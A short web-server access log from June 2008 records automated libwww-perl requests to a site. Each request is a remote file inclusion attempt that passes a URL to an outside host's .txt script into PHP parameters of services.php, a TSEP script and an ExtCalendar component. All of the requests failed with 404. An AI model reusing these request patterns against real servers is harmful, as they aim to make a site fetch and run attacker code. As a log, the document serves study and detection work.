203.22.204.167 - - [08/Jun/2008:12:16:24 -0700] "GET /services.php?page=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:12:16:24 -0700] "GET /logs/access_080217.log//tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:12:16:25 -0700] "GET //tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:12:16:25 -0700] "GET /logs//tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.54.9.218 - - [08/Jun/2008:12:16:38 -0700] "GET /logs/access_080429.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
